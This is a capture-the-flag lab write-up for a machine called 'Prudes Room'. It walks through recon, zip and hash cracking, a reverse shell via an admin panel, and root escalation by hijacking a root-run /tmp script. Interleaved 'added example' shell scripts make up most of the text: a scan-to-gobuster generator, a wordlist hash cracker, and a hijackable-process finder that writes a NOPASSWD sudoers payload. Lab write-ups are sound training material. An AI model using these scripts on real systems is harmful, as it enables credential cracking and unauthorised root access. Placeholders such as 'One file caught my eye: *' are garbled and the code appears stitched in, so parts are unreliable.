Okay, so I decided to tackle the “Prudes Room” challenge today. I’d heard about it, seen some write-ups, but never actually got my hands dirty with it. Figured it was time to change that.
First things first, I fired up my VM and got the target machine running. I needed to figure out its IP, so I used netdiscover to find it on the local network.
Now that I had the target's IP, I threw nmap at it, using the -sC and -sV flags to run the default scripts and grab service versions.
It looked like there were a few ports open. Port 80 is usually a good place to start, so I opened up Firefox and typed in the IP address.
I was greeted with a basic webpage, and I poked around a little. There were some images with a couple of names on them, so I saved those names to a file as a potential username list to use later on.
Next, I ran gobuster (a tool that brute-forces hidden directories and files from a wordlist) against the webserver to see if anything interesting was hiding. And there was: I got a couple of hits.

- /admin
- /config
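The enumeration above is the usual netdiscover, nmap, gobuster chain. As an added example (not code from the original write-up), here is the glue a practitioner tends to write between the two scanners: parse nmap's grepable (-oG) output into a list of open ports and turn every HTTP-looking service into a gobuster command, so nothing on a non-standard port gets missed. The host, ports and banners in SAMPLE_NMAP_OG are constructed, and the wordlist path is an assumption.

```shell
#!/usr/bin/env bash
# Added example, not code from the original write-up: parse nmap's grepable
# (-oG) output into a list of open ports and turn the HTTP ones into gobuster
# commands. The host, ports and banners in SAMPLE_NMAP_OG are constructed,
# and the wordlist path is an assumption.
set -eu

# Constructed stand-in for `nmap -sC -sV -oG - 10.10.10.5` output.
SAMPLE_NMAP_OG='# Nmap 7.94 scan initiated
Host: 10.10.10.5 ()  Status: Up
Host: 10.10.10.5 ()  Ports: 22/open/tcp//ssh//OpenSSH 7.6p1/, 80/open/tcp//http//Apache httpd 2.4.29/, 139/filtered/tcp//netbios-ssn///, 8443/open/tcp//ssl|http//nginx/  Ignored State: closed (996)
# Nmap done'
WORDLIST=/usr/share/wordlists/dirb/common.txt   # assumed path

# open_ports: reads grepable output on stdin, prints "port/proto service"
# for every port nmap reported as open (filtered/closed ports are dropped).
open_ports() {
  grep '^Host:.*Ports:' \
    | sed 's/.*Ports: //; s/[[:space:]]*Ignored State.*//' \
    | tr ',' '\n' \
    | awk -F/ '{ sub(/^ +/, "", $1); if ($2 == "open") print $1 "/" $3 " " $5 }'
}

# gobuster_cmds IP WORDLIST: reads open_ports output on stdin and prints one
# gobuster invocation per HTTP service, using https when nmap saw TLS.
gobuster_cmds() {
  awk -v ip="$1" -v wl="$2" '
    $2 ~ /http/ {
      split($1, p, "/")
      scheme = ($2 ~ /ssl|https/) ? "https" : "http"
      printf "gobuster dir -u %s://%s:%s -w %s -x php,txt,bak,zip\n", scheme, ip, p[1], wl
    }'
}

# Demo on the constructed scan: list open ports, then the gobuster commands.
printf '%s\n' "$SAMPLE_NMAP_OG" | open_ports
printf '%s\n' "$SAMPLE_NMAP_OG" | open_ports | gobuster_cmds 10.10.10.5 "$WORDLIST"
```

On a real target, replace the embedded sample with `nmap -sC -sV -oG - <ip> | open_ports`; the commands are printed rather than executed so they can be reviewed (and the -x extension list adjusted) before anything noisy runs.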
I checked out the /admin directory first, and there's a login page! Then I checked out /config, which turned out to hold some config and backup files. A web-reachable backup directory is a classic misconfiguration: anything in it is available to anyone who guesses the path. One file caught my eye: *. I downloaded that.
The zip file was password protected. No biggie. I grabbed fcrackzip and ran a dictionary attack against it using *. After a bit of waiting, boom, password cracked!
Inside the zip were a bunch of files. I opened them up, hoping for some juicy credentials or clues. One of the files contained a username and a hashed password.
Time to crack that hash. I used John the Ripper for this. It took a little while, but eventually it spat out the plaintext password.
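Both cracking steps above are the same idea: hash every candidate from a wordlist and compare. As an added example (not code from the original write-up, and not what john does internally), here is that loop in shell with a few John-style mangling rules, so it is clear why a password that is not in the wordlist verbatim still falls. The digest type is guessed from its length, the way john and hashcat autodetect raw MD5/SHA-1/SHA-256/SHA-512; the wordlist and the target hash are constructed. The hash from the zip may well be a salted format, which is exactly when you hand it to john proper instead.

```shell
#!/usr/bin/env bash
# Added example, not code from the original write-up: a dictionary attack with
# a few John-style mangling rules against an unsalted hex digest. The digest
# type is guessed from its length (raw md5/sha1/sha256/sha512). The wordlist
# and the target hash below are constructed.
set -eu

# digest_tool HEX: print the coreutils command that produces a digest of
# this length, or fail if the length matches no supported raw digest.
digest_tool() {
  case ${#1} in
    32)  echo md5sum ;;
    40)  echo sha1sum ;;
    64)  echo sha256sum ;;
    128) echo sha512sum ;;
    *)   return 1 ;;
  esac
}

# hexdigest TOOL STRING: hex digest of STRING (no trailing newline hashed).
hexdigest() {
  printf '%s' "$2" | "$1" | cut -d' ' -f1
}

# mangle WORD: emit candidates derived from WORD, one per line. This is a
# tiny subset of john's default rules: as-is, Capitalized, common suffixes.
mangle() {
  local w=$1 cap suf
  cap="$(printf '%s' "$w" | cut -c1 | tr '[:lower:]' '[:upper:]')$(printf '%s' "$w" | cut -c2-)"
  printf '%s\n' "$w" "$cap"
  for suf in 1 123 2023 '!'; do
    printf '%s\n' "$w$suf" "$cap$suf"
  done
}

# crack_hash HEX WORDLIST: print the first mangled candidate whose digest
# matches HEX and return 0; return 1 if the wordlist is exhausted.
crack_hash() {
  local target tool word cand
  target=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
  tool=$(digest_tool "$target") || { echo "unsupported digest length ${#target}" >&2; return 1; }
  while IFS= read -r word; do
    [ -n "$word" ] || continue
    for cand in $(mangle "$word"); do
      if [ "$(hexdigest "$tool" "$cand")" = "$target" ]; then
        printf '%s\n' "$cand"
        return 0
      fi
    done
  done < "$2"
  return 1
}

# Demo with constructed data: a three-word list and the SHA-256 of "Winter123",
# which is not in the list verbatim and only falls out of the mangling rules.
WORDLIST=$(mktemp)
printf 'admin\nwinter\npassword\n' > "$WORDLIST"
TARGET=$(hexdigest sha256sum 'Winter123')
if crack_hash "$TARGET" "$WORDLIST"; then
  echo "cracked"
else
  echo "not found"
fi
rm -f "$WORDLIST"
```

Each candidate costs a process spawn here, so this is for understanding, not speed; the point is the rule expansion, which is also why a decent password policy has to reject "dictionary word plus year" and not just dictionary words.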
Now I had a username and password! I went back to that /admin login page I found earlier, plugged in the credentials, and… I was in!
I was in the admin panel, and it had a command execution feature. That's a reverse shell waiting to happen. I started a netcat listener on my machine first, then entered a simple netcat reverse shell command on the site, and boom, the reverse shell connected back.
Now I was on the machine as a low-privilege user, and I started looking for ways to escalate. First I tried sudo -l, and it showed I could run one file as root. The file looked like a simple script, so I ran it.
The screen went nuts and I realized it was running inside a screen session, so I detached from it. Then I checked the process list, and I saw root running a bash script out of the /tmp folder.
So I navigated to /tmp and created my own bash script containing a single command to add my user to the sudoers file. Root executing a script out of a world-writable directory is the whole privesc here: whatever lands at that path gets run as root. I waited a bit for the root process to pick up my script, and then…
I tried `sudo su`, and it worked! I was root! I grabbed the root flag, and that's it!
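The check behind that last step is worth having as a script, because "root is running something out of /tmp" is easy to miss in a long process list. As an added example (not code from the original write-up), this reads `ps -eo user,pid,args` output and reports root processes whose command line names a file we can create or overwrite, then writes the same kind of sudoers payload the write-up used. The process list and the directory standing in for /tmp are constructed so it runs offline; the user name alice is an assumption. Note the sticky-bit caveat: a root-owned file that already exists in /tmp cannot be replaced by another user, so the function only reports paths that are missing or writable.

```shell
#!/usr/bin/env bash
# Added example, not code from the original write-up: triage for the privesc
# used above. Reads `ps -eo user,pid,args` output and reports root processes
# whose command line names a file we can create or overwrite. The process
# list and the directory standing in for /tmp are constructed; the user
# name alice is an assumption.
set -eu

# writable_root_scripts PS_FILE: print "pid path status" for every root
# process whose argument list contains an absolute path inside a directory we
# can write to, where status is "creatable" (the file does not exist yet) or
# "writable" (it exists and we can edit it). A root-owned file in a sticky
# directory like /tmp is neither and is skipped: the sticky bit stops us
# deleting or renaming it, so it cannot be swapped out.
writable_root_scripts() {
  local user pid rest arg dir status
  while read -r user pid rest; do
    [ "$user" = root ] || continue
    for arg in $rest; do
      case $arg in /*) ;; *) continue ;; esac
      dir=$(dirname "$arg")
      [ -d "$dir" ] && [ -w "$dir" ] || continue
      if [ ! -e "$arg" ]; then
        status=creatable
      elif [ -w "$arg" ]; then
        status=writable
      else
        continue
      fi
      printf '%s %s %s\n' "$pid" "$arg" "$status"
    done
  done < "$1"
}

# plant_sudoers_payload PATH USER: write the script the root job will execute.
# It appends a NOPASSWD rule for USER to /etc/sudoers, which is what the
# write-up did; once root has run it, `sudo su` works without a password.
plant_sudoers_payload() {
  cat > "$1" <<EOF
#!/bin/bash
echo "$2 ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
EOF
  chmod 755 "$1"
}

# Demo on a constructed process list. DEMO_DIR stands in for /tmp; the root
# job at pid 812 runs a script there that does not exist yet.
DEMO_DIR=$(mktemp -d)
PS_FILE=$DEMO_DIR/ps.txt
cat > "$PS_FILE" <<EOF
USER PID COMMAND
root 1 /sbin/init
root 812 /bin/bash $DEMO_DIR/cleanup.sh
root 820 /usr/bin/python3 /opt/monitor/monitor.py
alice 901 /bin/bash $DEMO_DIR/notes.sh
EOF
echo "hijackable root processes:"
writable_root_scripts "$PS_FILE"
plant_sudoers_payload "$DEMO_DIR/cleanup.sh" alice
echo "planted payload:"
cat "$DEMO_DIR/cleanup.sh"
rm -rf "$DEMO_DIR"
```

On a target, run `ps -eo user,pid,args > /tmp/ps.txt` (or any directory you can write to) and feed that file in; run it as the low-privilege user, since as root every directory is writable and the check means nothing. The same function also flags root jobs whose script lives in a directory that is writable for other reasons, such as a home directory or a badly chmod'ed /opt path.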
That was a fun one. Definitely learned a few things along the way. Gotta love these practical challenges!